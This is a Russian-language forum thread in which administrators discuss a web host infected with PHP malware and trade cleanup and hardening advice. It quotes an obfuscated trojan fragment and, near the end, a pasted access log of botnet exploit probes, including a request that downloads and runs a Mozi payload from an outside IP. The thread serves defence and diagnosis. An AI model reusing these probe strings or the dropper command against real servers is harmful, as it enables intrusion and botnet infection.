Кто сталкивался с этой заразой, как лечили ?

Переходом с PHP-помойки для изготовления сайтов на какую-либо зрелую технологию. Пример – ЛОР.

Кто сталкивался с этой заразой, как лечили

Элементарно. Меняешь пароли, всё вычищаешь, потом накатываешь из бекапа на локалку, накатываешь обновления и, в завершении, заливаешь на хостинг.

Обратитесь к администратору сайтов, он посмотрит.

Даёшь вирусы на пиэйчпи!

А что за файлы (я про их содержимое)?

Да ересь несусветная. типа: ($FILL8I8L8I=«81h_g5f4z9w2amcse0xvipylj3doubktr7q6n-»;$F8I8L8LIIL=$FILL8I8L8I{6}.$FILL8I8L8I{20}.$FILL8I8L8I{23}.)

Поставил на аудит дерикторию с сайтом, что-бы узнать какой процесс и кем создаются данные файлы, отпишу как что-то узнаю.

Да, похоже на какой-то зловред. https://xtemos.com/forums/topic/website-down-malicious-files-are-present/

Подписался, чтоб не пропустить, интересно

Можете поиграться с кодом https://malwaredecoder.com/.

спасибо за ссылку, но к сожалению там ничего нет, прикол в том, что сайтов на вордпрессе как раз и нет, а файлы типа wp-load.php и директория wp-admin появляются. Явно что-то взломали, интересно просто что, и как.

А, вау, да, действительно, надо наблюдать.

Даёшь вирусы на пиэйчпи!

Эм, рынок подобных PHP-вирусов наверное даже обширнее чем то, что происходит в зоопарке Microsoft Windows.

На хосты сайтов к нерадивым Web-мастерам постоянно подкидывают шеллы, майнеры, рекламоспамилки и пр. троянцев.

И всё же вирусы не так страшны, если сравнивать с большой частью разработчиков.

Да ересь несусветная. типа: ($FILL8I8L8I=«81h_g5f4z9w2amcse0xvipylj3doubktr7q6n-»;$F8I8L8LIIL=$FILL8I8L8I{6}.$FILL8I8L8I{20}.$FILL8I8L8I{23}.)

Это не ересь, а кусок сжатого кода трояна:

https://webcache.googleusercontent.com/search?q=cache:7DjoCEk_jjwJ:https://malwaredecoder.com/result/d411ab66050738cfd934657291b54968+&cd=1&hl=en&ct=clnk&gl=ru&client=firefox-b-d

Это не ересь, это код.

php > $a = "81h_g5f4z9w2amcse0xvipylj3doubktr7q6n-";
php > echo $a{6}.$a{20}.$a{23};
fil

Так потихоньку можно собрать программку.

Переходом с PHP-помойки для изготовления сайтов на какую-либо зрелую технологию

А без особой разницы. Хотя PHP такое себе…

Если абы как что налеплено, то это не поможет. Разве что Джо придёт на помощь.

с большой частью разработчиков

Где-то несколько лет назад позитивщики оценивали. Где-то половина инстансов на линуксе это решето с 1-day дырками.

Вот такая вот реальность. Хотя своим локальным локалхостом можешь гордится.

У вас WP, какая версия?

ТС отписался что сайты у него вообще не на WordPress: Вирус (kindex.php, bindex.php и т.д.) (комментарий)

Там просто ботнет какой-то по площадям кроет через дырки в PHP, предполагая что у ТС стоит WordPress, хотя у него сайты наверняка на каком-то дыряво-самописном CMS.

Тут бы желательно всю инфу узнать:

Дистр, версия PHP, версия Apache или Nginx и пр.

ТС отписался что сайты у него вообще не на WordPress: Вирус (kindex.php, bindex.php и т.д.) (комментарий)

Там просто ботнет какой-то по площадям кроет через дырки в PHP, предполагая что у ТС стоит WordPress, хотя у него сайты наверняка на каком-то дыряво-самописном CMS.

Не увидела его ответ. Очень может быть.

Тут бы желательно всю инфу узнать:

Дистр, версия PHP, версия Apache или Nginx и пр.

Или с правами что-то намудрено, это как вариант тоже исключать нельзя.

Берешь свою cms, идешь на https://cve.mitre.org, читаешь, плачешь, латаешь дыры (платишь тому, кто залатает их за тебя). Чистишь говно которое тебе залили. Профит.

Рекомендую ещё посмотреть логи веб сервера, особенно на ошибки и встречаются ли там обращения к этим файлам.

Меня когда-то так поломали через открытый наружу webmin :))

LINUX MALWARE DETECT (LMD)

Всем хостерам на *NIX надо прочесть эту страничку: https://www.rfxn.com/projects/linux-malware-detect/

Пользователям ClamAV желательно но добавить базы от LMD:

https://www.rfxn.com/downloads/rfxn.ndb

https://www.rfxn.com/downloads/rfxn.ndb.md5

https://www.rfxn.com/downloads/rfxn.hdb

https://www.rfxn.com/downloads/rfxn.hdb.md5

К большому сожалению проект LMD PGP подписи на сканер и базы не предоставляет.

Аудит, если правильно и сразу настроен, то поможет найти виновного.

Защити каталог со скриптами режимом RX без права записи, а каталог с базами RW без права исполнения от туда PHP скриптов.

Переходом с PHP-помойки для изготовления сайтов на какую-либо зрелую технологию. Пример – ЛОР.

Ага, на питон или, упаси Господи, на джаву.

Владимир Владимирович из Кремля

Шило на мыло!

1. ftp сервер вообще удалить
2. ssh только по ключу
3. К apache/nginx прикрутить waf (например modesecurity)

Это на будущее - когда то что уже заражено спецы Вам вычистят.

Благодарю Всех за ответы, не ожидал что так быстро и много откликнуться людей. Если будут какието результаты от аудита, сообщу.

Если будут какието результаты от аудита, сообщу.

Если не будут, то пишите сюда https://virusinfo.info/forumdisplay.php?f=203

Быть может в бд нужно искать концы?

Не забудь обновить плагины, меня ломали через плагины раз 5.

Панель управления хостингом на серваках стоит? Я бы с этого начал, особенно, если там какая-нибудь VestaCP.

Ну, а так верно все - логи смотреть, аудит делать. Зловред вообще мог через дыру никак не связанную с PHP проникнуть.

Похоже сайт на вордпресе и скорее всего какой нибудь плагин стоит в этом вордпресе который это все мутит. Нужно зайти в админку вордпреса и удалить этот плагин

Тоже так подумал, но не вордпресс.

Вирус (kindex.php, bindex.php и т.д.) (комментарий)

Пример – ЛОР

Франкенштейн из жабы с кусками скалы? Ну такое

Там просто ботнет какой-то по площадям кроет через дырки в PHP, предполагая что у ТС стоит WordPress

Ботнеты постоянно заглядывают. Два три раза в сутки. Известные уязвимости в PHP уже можно по access_log учить

GET /config/getuser?index=0 HTTP/1.1 400 271 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 
GET /login HTTP/1.1 404 9 "-" "observer v1.0"
POST /api/jsonws/invoke HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
POST /mifs/.;/services/LogService HTTP/1.1 404 9 "https://34.90.168.93:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /console/ HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.59.36.110:42935/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 404 169 "-" "Hello, world"

https://urlhaus.abuse.ch/api/